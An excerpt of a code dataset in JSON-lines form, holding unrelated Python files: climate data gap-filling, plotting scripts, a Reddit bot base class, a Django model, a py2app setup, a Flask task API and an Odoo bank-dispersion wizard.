pd.date_range(da_no_nans.time.min().item(),\n da_no_nans.time.max().item(), freq=freq)\n missing_time = pd.to_datetime(\n sorted(\n set(new_time).difference(\n set(old_time))))\n missing_data = np.empty((missing_time.shape))\n if verbose:\n print('proccessing missing data...')\n for i in range(len(missing_data)):\n # replace data as to monthly long term mean and diurnal hour:\n # missing_data[i] = (climatology.sel(month=missing_time[i].month) +\n missing_data[i] = (climatology.sel({clim_period: getattr(missing_time[i],\n clim_period)}) +\n diurnal.sel(hour=missing_time[i].hour))\n series = pd.Series(data=missing_data, index=missing_time)\n series.index.name = 'time'\n mda = series.to_xarray()\n mda.name = da.name\n new_data = xr.concat([mda, da_no_nans], 'time')\n new_data = new_data.sortby('time')\n # copy attrs:\n new_data.attrs = da.attrs\n new_data.attrs['description'] = 'missing data was '\\\n 'replaced by using ' + clim_period \\\n + ' mean and hourly signal.'\n # put new_data and missing data into a dataset:\n dataset = new_data.to_dataset(name=new_data.name)\n dataset[new_data.name + '_original'] = da_no_nans\n if verbose:\n print('done!')\n if savepath is not None:\n da = dataset[new_data.name]\n sid = da.attrs['station_id']\n cname = da.attrs['channel_name']\n name = da.name\n comp = dict(zlib=True, complevel=9) # best compression\n encoding = {var: comp for var in da.to_dataset(name=name).data_vars}\n filename = '{}_{}_{}_10mins_filled.nc'.format(name, sid, cname)\n if verbose:\n print('saving...')\n da.to_netcdf(savepath / filename, 'w', encoding=encoding)\n print('{} was saved to {}.'.format(filename, savepath))\n return\n return dataset\n\n# # resample to 5min with resample_method: (interpolate is very slow)\n# print('resampling 
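The fill strategy above (per-day climatology plus the mean diurnal anomaly) can be exercised on a synthetic series; a compact sketch of the same decomposition:

```python
import numpy as np
import pandas as pd
import xarray as xr

time = pd.date_range('2018-01-01', '2018-01-10 23:50', freq='10min')
signal = 20 + 5 * np.sin(2 * np.pi * time.hour / 24)
da = xr.DataArray(signal, dims=['time'], coords={'time': time})
da_gap = da.where(da['time'].dt.day != 5)  # punch a one-day hole

clim = da_gap.groupby('time.dayofyear').mean('time')
anom = da_gap.groupby('time.dayofyear') - clim
diurnal = anom.groupby('time.hour').mean('time')
# a missing stamp t is then rebuilt as clim[dayofyear(t)] + diurnal[hour(t)]
```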
to 5 mins using {}'.format(resample_method))\n# # don't resample the missing data:\n# dataset = dataset.resample(time='5min').ffill()","sub_path":"ims_procedures.py","file_name":"ims_procedures.py","file_ext":"py","file_size_in_byte":63162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"451822568","text":"#! /usr/bin/env python3\nfrom sklearn.datasets import load_iris\nimport matplotlib.pyplot as plt\n\n# Load Iris data set\ndata = load_iris()\nx = data['data']\n\n# Plot the box and whisker\nplt.close('all')\nfig = plt.figure(1)\nax = fig.add_subplot(111)\nax.boxplot(x)\nax.set_xticklabels(data['feature_names'])\nplt.show()\n","sub_path":"ai/srcs/box.py","file_name":"box.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"630291440","text":"import pygal.maps.world\r\nimport json\r\nfrom country_codes import get_country_code\r\nfrom pygal.style import RotateStyle\r\nfrom pygal.style import LightColorizedStyle,RotateStyle\r\n\r\n\r\n\r\nfilename='population_data.json'\r\nwith open(filename) as f:\r\n\tpop_date=json.load(f)\r\n\t\r\ncc_populations={}\r\nfor pop_dict in pop_date:\r\n\tif pop_dict['Year']=='2010':\r\n\t\tcountry=pop_dict['Country Name']\r\n\t\tpopulation=int(float(pop_dict['Value']))\r\n\t\tcode=get_country_code(country)\r\n\t\tif code:\r\n\t\t\tcc_populations[code]=population\r\n\t\t\t\r\n\t\t\t\r\ncc_pops_1,cc_pops_2,cc_pops_3={},{},{}\r\nfor cc,pop,in cc_populations.items():\r\n\tif pop<10000000:\r\n\t\tcc_pops_1[cc]=pop\r\n\telif pop<1000000000:\r\n\t\tcc_pops_2[cc]=pop\r\n\telse:\r\n\t\tcc_pops_3[cc]=pop\r\n\r\nprint(len(cc_pops_1), len(cc_pops_2), len(cc_pops_3))\r\n\t\t\t\r\n#wm_style=RotateStyle('#336699')\r\nwm_style=LightColorizedStyle\r\nwm_style=RotateStyle('#336699',base_style=LightColorizedStyle)\r\nwm=pygal.maps.world.World(style=wm_style)\r\n\r\nwm.title='World Population in 2010, by Country'\r\nwm.add('0-10m',cc_pops_1)\r\nwm.add('10m-1bn',cc_pops_2)\r\nwm.add('>1bn',cc_pops_3)\r\n\r\nwm.render_to_file('world_population_2.svg')","sub_path":"world_population/world_population.py","file_name":"world_population.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"602431376","text":"from re import sub\nimport logging\nimport praw\nimport time\nfrom bots._helpers import SIGNATURE\n\n\nclass _BaseBot:\n \"\"\"\n Base bot with common methods.\n Gets information about a query from a webpage and then puts it into reddit format\n \"\"\"\n\n def __init__(self, callsign, reply_template):\n self.callsign = callsign\n self.template = reply_template\n\n def _check_message(self, msg):\n \"\"\"\n Uses regexp to check if the bot has been called.\n \"\"\"\n return self.callsign.findall(msg)\n\n def _get_info(self, search_string):\n \"\"\"\n Fetches information from the web about _search_string_\"\"\"\n raise NotImplementedError\n\n def _get_reply_text(self, info, search_string):\n \"\"\"\n Formats reply into reddit friendly message.\n \"\"\"\n if info:\n return self.template.format(**info)\n return \">{} \\n\\nNo results found.\".format(search_string)\n\n def run(self, comment):\n \"\"\"\n Main loop\n \"\"\"\n # limit to three calls per bot.\n search_strings = self._check_message(comment[\"body\"])[:3]\n replies = []\n for search_string in search_strings:\n logging.info(\"Callsign: {} \\n search string: {}\".format(\n self.callsign, 
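The three population buckets in the pygal record above amount to a single-pass classification; the same grouping with one loop (thresholds copied from the branches):

```python
buckets = {'0-10m': {}, '10m-1bn': {}, '>1bn': {}}
for cc, pop in cc_populations.items():
    key = '0-10m' if pop < 10000000 else ('10m-1bn' if pop < 1000000000 else '>1bn')
    buckets[key][cc] = pop
```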
search_string))\n info = self._get_info(search_string)\n reply = self._get_reply_text(info, search_string)\n replies.append(reply)\n return replies\n","sub_path":"bots/_BaseBot.py","file_name":"_BaseBot.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"4706404","text":"from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nimport uuid\n\n\nclass Notification(models.Model):\n \"\"\"\n Model which represents a Notification.\n \"\"\"\n\n id = models.UUIDField(\n verbose_name=_('Notification ID'),\n primary_key=True,\n default=uuid.uuid1,\n help_text=_('An ID which represents a specific Notification.'),\n editable=False,\n )\n\n date_created = models.DateTimeField(\n verbose_name=_('Date Created'),\n help_text=_('When the notification was created.'),\n auto_now_add=True,\n editable=False,\n )\n\n description = models.CharField(\n verbose_name=_('Description'),\n help_text=_('The description of the notification.'),\n max_length=1000,\n )\n\n mac_address = models.CharField(\n verbose_name=_('MAC Address'),\n help_text=_('The MAC Address of the device on the network.'),\n max_length=17,\n )\n\n def __str__(self):\n return 'MAC: {}, Description: {}'.format(self.mac_address, self.description)\n","sub_path":"mysite/notifications/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"600069621","text":"\"\"\"pyanno package setup definition\"\"\"\n\nfrom setuptools import setup, find_packages\n\n# ---- add ETS recipes for py2app\n\nimport types\nimport py2app.recipes\n\ndef ets_check(cmd, mf):\n m = mf.findNode('pyface')\n if m is None or m.filename is None:\n return None\n return dict(\n packages = ['pyface','enable','kiva','traits','wx','traitsui','chaco']\n )\n\npy2app.recipes.ets = types.ModuleType('py2app.recipes.ets')\npy2app.recipes.ets.check = ets_check\n\n\n# ---- /add ETS recipes for py2app\n\n\nfrom setup import setup_dict\n\nAPP = ['pyanno/ui/main.py']\nOPTIONS = {'argv_emulation': True, 'packages': 'pyanno'}\n\nsetup_py2app_dict = dict(\n app=APP,\n options={'py2app': OPTIONS},\n setup_requires=['py2app'],\n)\n\nsetup_py2app_dict.update(setup_dict)\n\nif __name__ == '__main__':\n setup(**setup_py2app_dict)\n","sub_path":"setup_py2app.py","file_name":"setup_py2app.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"168922362","text":"# -*- coding:utf-8 -*-\nfrom flask import Flask, jsonify, request, abort\n\napp = Flask(__name__)\n\ntasks = []\n\n\n@app.route('/api/v1.0/tasks/<int:task_id>', methods=['PUT', 'POST'])\ndef post_tasks(task_id):\n if not request.json:\n abort(404)\n task = {\n 'task_id': task_id,\n 'task_name': request.json.get('task_name', '')\n }\n tasks.append(task)\n return jsonify({'tasks': task})\n\n\n@app.route('/api/v1.0/tasks', methods=['GET'])\ndef get_tasks():\n return jsonify({'tasks': tasks})\n\n\n@app.route('/api/v1.0/tasks', methods=['DELETE'])\ndef delete_tasks():\n tasks[:] = []\n return jsonify({'tasks': tasks})\n\n\nif __name__ == '__main__':\n app.run(host='127.0.0.1', debug=True)\n","sub_path":"lib/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"522915304","text":"# -*- coding: utf-8 -*-\n# Part 
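The Flask task API in the record above is easiest to exercise with `requests`; a sketch against the routes as defined (Flask's default development port assumed):

```python
import requests

base = 'http://127.0.0.1:5000/api/v1.0'
requests.post(f'{base}/tasks/1', json={'task_name': 'write docs'})
print(requests.get(f'{base}/tasks').json())
# {'tasks': [{'task_id': 1, 'task_name': 'write docs'}]}
requests.delete(f'{base}/tasks')  # clears the in-memory list
```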
of Odoo. See LICENSE file for full copyright and licensing details.\n\nfrom odoo import api, fields, models\nfrom odoo.exceptions import UserError,ValidationError\nfrom odoo.tools.translate import _\nimport logging\n_logger = logging.getLogger(__name__)\n\nclass cls_wizarddispersion(models.TransientModel):\n _name = 'dispersionbancaria.wizard'\n\n fechaapertura = fields.Date(track_visibility='onchange',string=\"Fecha de apertura\",default=fields.Date.today(),required=True)\n agrupacioncaja_id=fields.Many2one(\"cb.typebox\",string=\"Agrupacion caja\",track_visibility='onchange',required=True)\n\n def _default_message(self):\n #Consulta para buscar las recepciones\n self.env.cr.execute('''\n select cast(sesion.start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE),agrupacion.name\n from cb_session sesion\n join cb_typebox agrupacion on sesion.boxtype_id=agrupacion.id \n where state='closed' and coalesce(incluidodispersion,'f') <> 't'\n and start_at is not null\n group by cast(sesion.start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE),agrupacion.name\n order by cast(sesion.start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE),agrupacion.name\n '''% ())\n #\n recepciones_obj=self.env.cr.fetchall()\n message=\"\"\n\n\n if recepciones_obj: \n message=\"[Dispersiones Pendientes del dia: (\"\n for res in recepciones_obj:\n message=message+res[1]+\" \"+res[0]+\", \"\n message=message+\")]\"\n pendientes=True\n else:\n pendientes=False\n message=\"\"\n\n return message\n\n def _default_messagecajas(self):\n #Consulta para buscar las recepciones\n self.env.cr.execute('''\n select cast(sesion.start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE),agrupacion.name\n from cb_session sesion\n join cb_typebox agrupacion on sesion.boxtype_id=agrupacion.id \n where (state = 'opened') and start_at is not null\n group by cast(sesion.start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE),agrupacion.name\n order by cast(sesion.start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE),agrupacion.name\n '''% ())\n #\n recepciones_obj=self.env.cr.fetchall()\n message=\"\"\n \n if recepciones_obj: \n message=\"[Caja(s) abierta(s): (\"\n for res in recepciones_obj:\n message=message+res[1]+\" \"+res[0]+\", \"\n message=message+\")]\"\n pendientes=True\n else:\n pendientes=False\n message=\"Todas la cajas estan cerradas\"\n\n return message\n\n\n def _default_messagerecepcion(self):\n #Consulta para buscar las recepciones\n self.env.cr.execute('''\n select cast(sesion.start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE),agrupacion.name\n from cb_session sesion\n join cb_typebox agrupacion on sesion.boxtype_id=agrupacion.id \n where (state = 'closing_control') and start_at is not null\n group by cast(sesion.start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE),agrupacion.name\n order by cast(sesion.start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE),agrupacion.name\n '''% ())\n #\n recepciones_obj=self.env.cr.fetchall()\n message=\"\"\n \n if recepciones_obj: \n message=\"[Pendiente(s) de Recepcion faltantes por procesar: (\"\n for res in recepciones_obj:\n message=message+res[1]+\" \"+res[0]+\", \"\n message=message+\")]\"\n pendientes=True\n else:\n pendientes=False\n message=\"Todas las recepciones están procesadas\"\n\n return message\n\n def _default_pendientes(self):\n #Consulta para buscar las recepciones\n self.env.cr.execute('''\n select cast(start_at 
AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE)\n from cb_session \n where state='closed' and coalesce(incluidodispersion,'f') <> 't'\n and start_at is not null\n group by cast(start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE)\n order by cast(start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE)\n '''% ())\n recepciones_obj=self.env.cr.fetchall()\n \n if recepciones_obj: \n pendientes=True\n else:\n pendientes=False\n\n return pendientes\n\n message = fields.Char(string=\"Message\",default=_default_message)\n pendientes = fields.Boolean(\"Pendientes\",default=_default_pendientes,Traslate=True,track_visibility='onchange')\n messagecajas = fields.Char(string=\"Message\",default=_default_messagecajas)\n messagerecepciones = fields.Char(string=\"Message\",default=_default_messagerecepcion)\n\n\n @api.multi\n def genera_dispersion(self): \n #Se declaran los parametros por los cuales se hara la busqueda\n fecha=self.fechaapertura\n agrupacion=self.agrupacioncaja_id.id\n #Consulta para buscar las recepciones pendientes por procesar de fecha anterior a la que se quiere procesar actualmente\n self.env.cr.execute('''\n select id\n from cb_session \n where cast(start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE) <'%s' and boxtype_id='%s' and state='closed' and coalesce(incluidodispersion,'f') <> 't' and start_at is not null\n '''% (fecha,agrupacion))\n valida_recepciones=self.env.cr.fetchall()\n if valida_recepciones:\n raise ValidationError('Existen pendientes de recepciones por procesar inferiores a esta fecha')\n\n #Consulta para buscar las recepciones pendientes por procesar de fecha de apertura establecido\n self.env.cr.execute('''\n select id\n from cb_session \n where cast(start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE) ='%s' and boxtype_id='%s' and state='closing_control' and start_at is not null\n '''% (fecha,agrupacion))\n valida_recepciones=self.env.cr.fetchall()\n if valida_recepciones:\n raise ValidationError('Existen pendientes de recepciones por procesar')\n\n #Consulta para buscar las recepciones pendientes por procesar de fecha de apertura establecido\n self.env.cr.execute('''\n select id\n from cb_session \n where cast(start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE) ='%s' and boxtype_id='%s' and state='opened' and start_at is not null and start_at is not null\n '''% (fecha,agrupacion))\n valida_recepciones=self.env.cr.fetchall()\n if valida_recepciones:\n raise ValidationError('Existen cajas abiertas')\n \n\n #Consulta para buscar las recepciones correspondientes\n self.env.cr.execute('''\n select id idrecepcion\n from cb_session \n where cast(start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE)='%s' and boxtype_id='%s' and coalesce(incluidodispersion,'f') <> 't' and state='closed' and start_at is not null\n '''% (fecha,agrupacion))\n recepciones_obj=self.env.cr.fetchall()\n if recepciones_obj:\n #Inicio Crea cabecera para la dispersion\n print('dispersion automatica')\n _logger.warning('dispersion automatica')\n datosdispersion={}\n datosdispersion={\n 'fechaapertura':fecha,\n 'agrupacioncaja_id':agrupacion,\n 'fecha':fields.Date.today(),\n }\n dispersion=self.env['dispersionbancaria'].create(datosdispersion)\n _logger.warning('Inicio Importe Efectivo')\n _logger.warning('Fin importe_general_efectivo')\n efectivo=self.importe_general_efectivo(fecha,agrupacion)\n print('Fin Importe Efectivo')\n 
importetransacciones=efectivo['importetransacciones']\n importereal=efectivo['importereal']\n if importereal>importetransacciones:\n importereal=importetransacciones\n importeconsumido=0\n efectivo_obj=self.env['account.journal'].search([('id','=',efectivo['metodopago'])])\n else:\n raise ValidationError('No se encontaron recepciones para dispersar')\n\n\n #diccionario=[]\n for res in recepciones_obj:\n recepcion=self.env['cb.session'].search([('id','=',res[0])])\n _logger.warning('recepcion: '+str(recepcion.name))\n recepcion.write({'incluidodispersion':True})\n\n _logger.warning('Inicio Crea relacion Dispersion - Session')\n datosdispersionrecepcion={}\n datosdispersionrecepcion={\n 'dispersion_id':dispersion.id,\n 'recepcion_id':recepcion.id,\n }\n self.env['dispersionrecepcion'].create(datosdispersionrecepcion)\n _logger.warning('Fin Crea relacion Dispersion - Session') \n for cobro in recepcion.order_ids:\n cad = cobro.cadena_validacion\n if cad.find(\"$0 \") == -1: \n _logger.warning('Inicio Recorre Cobro') \n _logger.warning(cobro.pos_reference)\n reqtransferencia=False\n\n #INICIO- Se busca que el cobro tenga conceptos con cuenta destino \n _logger.warning('valida_cobroctadestino')\n cobroctadestino=self.valida_cobroctadestino(cobro)\n #FIN- Se busca que el cobro tenga conceptos con cuenta destino\n\n #Se valida que el cobro tenga cuenta destino sino se procede a generar los registros tomando la cuenta destino del metodo de pago\n if cobroctadestino:\n #|||||||||||||||||||TRANSFERENCIA|||||||||||||||||||||\n #Aqui se trabajaran los cobros que contengan cobros con cta. destino\n _logger.warning('Cobro con conceptos de cta. destino')\n #INICIO Se busca que la suma de los conceptos que tengan cta.destino\n _logger.warning('importe_cobroctadestino')\n importectadestino=self.importe_cobroctadestino(cobro)\n #FIN Se busca que la suma de los conceptos que tengan cta.destino\n #INICIO Se descuenta el importe de conceptos de cuentas destino para posteriormente validar si se alcansa a cubrir dichos valores\n\n #if cobro.name=='1/0343':\n # raise ValidationError(importectadestino)\n _logger.warning('importe_noreqtransferencia')\n importemetodo=self.importe_noreqtransferencia(cobro,recepcion,importectadestino,importereal)\n\n if importemetodo:\n _logger.warning('Ajusto++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')\n _logger.warning('Ajusto el Efectivo')\n #print('Importe efectivo - '+str(importereal))\n #print('Importe a Descontar - '+str(importectadestino))\n importereal=importereal-importectadestino\n importeconsumido=importeconsumido+importectadestino\n #print('Neto: - '+str(importereal))\n _logger.warning('detalles_dispersionconceptoctadestino')\n self.detalles_dispersionconceptoctadestino(cobro,dispersion,recepcion,efectivo_obj) \n else:\n _logger.warning('NO Ajusto++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')\n self.detalles_atransferirconceptoctadestino(cobro,dispersion,recepcion) \n if 1==2:\n if importereal >=importectadestino:\n _logger.warning('Ajusto+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')\n _logger.warning('Ajusto el Efectivo')\n #print('Importe efectivo - '+str(importereal))\n #print('Importe a Descontar - '+str(importectadestino))\n importereal=importereal-importectadestino\n importeconsumido=importeconsumido+importectadestino\n #print('Neto: - '+str(importereal))\n 
self.detalles_dispersionconceptoctadestino(cobro,dispersion,recepcion,efectivo_obj)\n #FIN Se descuenta el importe de conceptos de cuentas destino para posteriormente validar si se alcansa a cubrir dichos valores\n else:\n _logger.warning('NO Ajusto++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')\n #Se hacen los registros a transferir cuando no alcance el efectivo \n self.detalles_atransferirconceptoctadestino(cobro,dispersion,recepcion)\n #|||||||||||||||||||TRANSFERENCIA|||||||||||||||||||||\n else:\n #raise ValidationError('aqui 2')\n #|||||||||||||||||||DISPERSION|||||||||||||||||||||\n #Aqui se trabajaran los cobros queno contengan cobros con cta. destino\n _logger.warning('Cobro sin conceptos de cta. destino')\n for metodospago in cobro.statement_ids:\n #Se valida que el metodo de pago requiera transferenia y si si se hacen los registros en los detalles de la dispersion,ya que de los que no requieren ya se tiene contempladosvy esto es para no repetir importes\n if metodospago.journal_id.transfer_required: \n #Se busca la cuenta destino\n _logger.warning('busca_ctadestino')\n cuentadestino=self.busca_ctadestino(metodospago,False)\n\n #print (metodospago.journal_id.name+' '+str(metodospago.amount))\n #Se valida si el tipo de pagp acepta la agrupacion \n if metodospago.journal_id.group_by_type:\n _logger.warning('agrupa')\n datoscomple=''\n else:\n _logger.warning('no agrupa')\n datoscomple=metodospago.concat\n\n if metodospago.journal_id.group_by_type:\n _logger.warning('requiere tranferencia')\n else:\n _logger.warning('no requiere tranferencia')\n\n itemajuste=self.env['cb.session.ajustes'].search([('session_id','=',recepcion.id),('metodo','=',metodospago.journal_id.id),('concat','=',metodospago.concat),('incluidodispersion','=',False)])\n importeori=metodospago.amount\n importe=metodospago.amount\n importeajustepositivo=0\n importeajustenegativo=0\n if itemajuste:\n if itemajuste.tipo_ajuste=='positivo':\n _logger.warning('Ajuste Positivo')\n importe=metodospago.amount+itemajuste.importe\n importeajustepositivo=itemajuste.importe\n else:\n _logger.warning('Ajuste Negativo')\n importe=metodospago.amount-itemajuste.importe\n importeajustenegativo=itemajuste.importe*-1\n self.crea_ajustes(itemajuste,dispersion.id)\n itemajuste.write({'incluidodispersion':True})\n\n #se busca en los detalles de la dispersion para agrupar por dato complementario\n itemdispersion=self.env['dispersionbancaria.line'].search([('dispersion_id','=',dispersion.id),('tipovalor_id','=',metodospago.journal_id.id),('destino_id','=',cuentadestino.id),('datoscomplementarios','=',datoscomple)])\n\n if not itemdispersion:\n _logger.warning('crea_itemsdispersion cobro normal')\n self.crea_itemsdispersion(metodospago.amount,metodospago.journal_id.id,metodospago.journal_id.id,importeori,importe,cuentadestino.id,cuentadestino.bank_id.id,reqtransferencia,dispersion.id,datoscomple,importeajustepositivo,importeajustenegativo,False,False)\n else:\n _logger.warning('actualiza_itemsdispersion cobro normal')\n self.actualiza_itemsdispersion(itemdispersion,importeori,importe,reqtransferencia,importeajustepositivo,importeajustenegativo)\n else:\n _logger.warning('La salta por ser igual a 0')\n _logger.warning(cobro.pos_reference)\n #|||||||||||||||||||DISPERSION|||||||||||||||||||||\n \n itemsajustes=self.env['cb.session.ajustes'].search([('session_id','=',recepcion.id),('incluidodispersion','=',False)])\n\n for itemajuste in itemsajustes:\n #raise 
ValidationError('encontro ajuste')\n cuentadestino=itemajuste.metodo.destination_account_id\n importeajustepositivo=0\n importeajustenegativo=0\n importe=0\n if itemajuste.tipo_ajuste=='positivo':\n _logger.warning('Ajuste Positivo')\n importe=importe+itemajuste.importe\n importeajustepositivo=itemajuste.importe\n else:\n _logger.warning('Ajuste Negativo')\n importe=importe-itemajuste.importe\n importeajustenegativo=itemajuste.importe*-1\n _logger.warning('crea_ajustes')\n self.crea_ajustes(itemajuste,dispersion.id)\n itemajuste.write({'incluidodispersion':True})\n\n itemdispersion=self.env['dispersionbancaria.line'].search([('dispersion_id','=',dispersion.id),('tipovalor_id','=',itemajuste.metodo.id),('destino_id','=',cuentadestino.id),('datoscomplementarios','=',itemajuste.concat)])\n if not itemdispersion:\n _logger.warning('crea_itemsdispersion ajuste')\n self.crea_itemsdispersion(itemajuste.importe,itemajuste.metodo.id,itemajuste.metodo.id,0,importe,cuentadestino.id,cuentadestino.bank_id.id,False,dispersion.id,itemajuste.concat,importeajustepositivo,importeajustenegativo,False,True)\n else:\n _logger.warning('actualiza_itemsdispersion ajuste')\n self.actualiza_itemsdispersion(itemdispersion,0,importe,False,importeajustepositivo,importeajustenegativo)\n \n #En caso que todavia se tenga efectivo se hace el registro en la dispersion con ese faltante\n restante=importetransacciones-importeconsumido\n if restante > 0:\n tipovalor_obj=self.env['account.journal'].search([('id','=',efectivo_obj.id)])\n reqtransferencia=False\n if tipovalor_obj:\n for atransferir in dispersion.atransferir_ids:\n if not reqtransferencia:\n if atransferir.tipovalor_id.id==tipovalor_obj.id:\n _logger.warning('se encontro el efectivo en atransferir')\n reqtransferencia=True\n else:\n _logger.warning('ya se habia encontrado el efectivo en atransferir')\n importeori=restante\n importe=restante\n cuentadestino=efectivo_obj.destination_account_id\n datoscomple=''\n\n #se busca en los detalles de la dispersion para agrupar por dato complementario\n itemdispersion=self.env['dispersionbancaria.line'].search([('dispersion_id','=',dispersion.id),('tipovalor_id','=',tipovalor_obj.id),('destino_id','=',cuentadestino.id),('efectivoglobal','=',True)])\n\n if not itemdispersion:\n _logger.warning('crea_itemsdispersion efectivo faltante')\n self.crea_itemsdispersion(importe,tipovalor_obj.id,tipovalor_obj.id,importeori,importe,cuentadestino.id,cuentadestino.bank_id.id,reqtransferencia,dispersion.id,datoscomple,0,0,False,True)\n else:\n _logger.warning('actualiza_itemsdispersion efectivo faltante')\n self.actualiza_itemsdispersion(itemdispersion,importeori,importe,reqtransferencia,0,0)\n\n\n _logger.warning('||||||||inicio reasignacion de registros a transferir||||||||||||')\n _logger.warning('reasignacion_atransferir')\n self.reasignacion_atransferir(dispersion,efectivo_obj)\n _logger.warning('||||||||fin reasignacion de registros a transferir||||||||||||')\n\n\n dispersion.genera_folio() \n return {'type': 'ir.actions.act_window',\n 'view_mode': 'form',\n 'view_type': 'form',\n 'res_id': dispersion.id,\n 'res_model': 'dispersionbancaria',\n }\n\n\n @api.multi\n def reasignacion_atransferir(self,dispersion,efectivo_obj):\n\n itemdispersion=self.env['dispersionbancaria.line'].search([('dispersion_id','=',dispersion.id),('efectivoglobal','=',True)])\n\n #comentamos ya que el efectivo no lo tenemos disponible\n '''\n if itemdispersion:\n #se le da prioridad al efectivo \n _logger.warning('Inicio recorrido a transferir efectivo')\n 
for itematransferirefectivo in dispersion.atransferir_ids:\n if efectivo_obj.id==itematransferirefectivo.tipovalor_id.id:\n _logger.warning('efectivo - reasignacion de registros a transferir en caso que tengas efectivo disponible')\n importe=itematransferirefectivo.importe\n importeglobalefectivo=itemdispersion.importeoriginal-(itemdispersion.importeajustenegativo*-1)\n\n if importeglobalefectivo >= importe:\n cuentadestino=itematransferirefectivo.ctadestino_id\n reqtransferencia=False\n datoscomple=itematransferirefectivo.conceptocobro\n\n itemctadestino=self.env['dispersionbancaria.line'].search([('dispersion_id','=',dispersion.id),('tipovalor_id','=',efectivo_obj.id),('destino_id','=',cuentadestino.id),('datoscomplementarios','=',datoscomple)])\n if not itemctadestino:\n self.crea_itemsdispersion(importe,efectivo_obj.id,efectivo_obj.id,importe,importe,cuentadestino.id,cuentadestino.bank_id.id,reqtransferencia,dispersion.id,datoscomple,0,0,False,False)\n\n else:\n self.actualiza_itemsdispersion(itemctadestino,importe,importe,reqtransferencia,0,0)\n\n itemdispersion.importeoriginal=itemdispersion.importeoriginal-importe\n itemdispersion.importe=itemdispersion.importe-importe\n itematransferirefectivo.unlink()\n '''\n #tipos de valor diferente del efectivo\n '''\n _logger.warning('Inicio recorrido a transferir otros')\n for itematransferir in dispersion.atransferir_ids:\n if efectivo_obj.id!=itematransferir.tipovalor_id.id:\n _logger.warning('otros - reasignacion de registros a transferir en caso que tengas efectivo disponible')\n importe=itematransferir.importe\n importeglobalefectivo=itemdispersion.importeoriginal-(itemdispersion.importeajustenegativo*-1)\n\n if importeglobalefectivo >= importe:\n cuentadestino=itematransferir.ctadestino_id\n reqtransferencia=False\n datoscomple=itematransferir.conceptocobro\n\n itemctadestino=self.env['dispersionbancaria.line'].search([('dispersion_id','=',dispersion.id),('tipovalor_id','=',efectivo_obj.id),('destino_id','=',cuentadestino.id),('datoscomplementarios','=',datoscomple)])\n if not itemctadestino:\n self.crea_itemsdispersion(importe,efectivo_obj.id,efectivo_obj.id,importe,importe,cuentadestino.id,cuentadestino.bank_id.id,reqtransferencia,dispersion.id,datoscomple,0,0,False,False)\n\n else:\n self.actualiza_itemsdispersion(itemctadestino,importe,importe,reqtransferencia,0,0)\n \n itemdispersion.importeoriginal=itemdispersion.importeoriginal-importe\n itemdispersion.importe=itemdispersion.importe-importe\n itematransferir.unlink()\n '''\n \n _logger.warning('marca como a tranferir los detalles de la dispersion que no alcanzara importe del efectivo')\n for itematransferirreales in dispersion.atransferir_ids: \n itemsdispersiontransfiere=self.env['dispersionbancaria.line'].search([('dispersion_id','=',dispersion.id),('tipovalor_id','=',itematransferirreales.tipovalor_id.id),('destino_id','=',itematransferirreales.ctaorigen_id.id),('datoscomplementarios','=',itematransferirreales.concat)])\n for item in itemsdispersiontransfiere:\n item.reqtransferencia=True\n _logger.warning('marcando detalles de dispersion con a transferir')\n dispersion.write({'reqtransferencia': True})\n\n #SE GENEREAN LOS REGISTROS DE LAS CUENTAS DESTINO PARA EL OFICIO\n cuenta_obj=self.env['ctadestino.transferencia'].search([('dispersion_id','=',dispersion.id),('ctadestino_id','=',itematransferirreales.ctadestino_id.id)])\n if not cuenta_obj:\n cta_obj={}\n cta_obj={\n 'dispersion_id':dispersion.id,\n 'ctadestino_id':itematransferirreales.ctadestino_id.id,\n 
